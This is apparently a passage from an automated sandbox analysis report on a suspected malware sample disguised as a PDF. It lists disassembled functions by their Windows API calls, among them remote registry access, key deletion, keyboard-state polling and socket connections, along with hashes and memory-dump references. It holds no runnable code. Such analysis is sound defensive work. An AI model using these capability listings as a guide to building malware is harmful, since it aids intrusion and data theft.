                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$CloseCountersCurrentHandleOpen
                              • String ID:
                              • API String ID: 3488606520-0
                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                              Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                              Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressProc$Library$FreeLoad
                              • String ID:
                              • API String ID: 2449869053-0
                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                              Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004563A6
                              • ScreenToClient.USER32(?,?), ref: 004563C3
                              • GetAsyncKeyState.USER32(?), ref: 00456400
                              • GetAsyncKeyState.USER32(?), ref: 00456410
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorLongScreenWindow
                              • String ID:
                              • API String ID: 3539004672-0
                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                              Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID:
                              • API String ID: 327565842-0
                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                              Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                              Download Yara Rule
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String
                              • String ID:
                              • API String ID: 2832842796-0
                              • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                              • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                              Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Enum$CloseDeleteOpen
                              • String ID:
                              • API String ID: 2095303065-0
                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                              Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00436A24
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: RectWindow
                              • String ID:
                              • API String ID: 861336768-0
                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                              Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 00449598
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                              • _wcslen.LIBCMT ref: 0044960D
                              • _wcslen.LIBCMT ref: 0044961A
                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 1856069659-0
                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                              Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004478E2
                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                              • GetCursorPos.USER32(00000000), ref: 0044796A
                              • TrackPopupMenuEx.USER32(01736340,00000000,00000000,?,?,00000000), ref: 00447991
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CursorMenuPopupTrack$Proc
                              • String ID:
                              • API String ID: 1300944170-0
                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                              Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004479CC
                              • GetCursorPos.USER32(?), ref: 004479D7
                              • ScreenToClient.USER32(?,?), ref: 004479F3
                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Client$CursorFromPointProcRectScreenWindow
                              • String ID:
                              • API String ID: 1822080540-0
                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                              Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 659298297-0
                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                              Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                • Part of subcall function 00440D98: SendMessageW.USER32(01731B70,000000F1,00000000,00000000), ref: 00440E6E
                                • Part of subcall function 00440D98: SendMessageW.USER32(01731B70,000000F1,00000001,00000000), ref: 00440E9A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$EnableMessageSend$LongShow
                              • String ID:
                              • API String ID: 142311417-0
                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                              Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                              Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00445879
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                              • _wcslen.LIBCMT ref: 004458FB
                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                              • String ID:
                              • API String ID: 3087257052-0
                              • Opcode ID: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                              • Opcode Fuzzy Hash: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                              Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                              Memory Dump Source
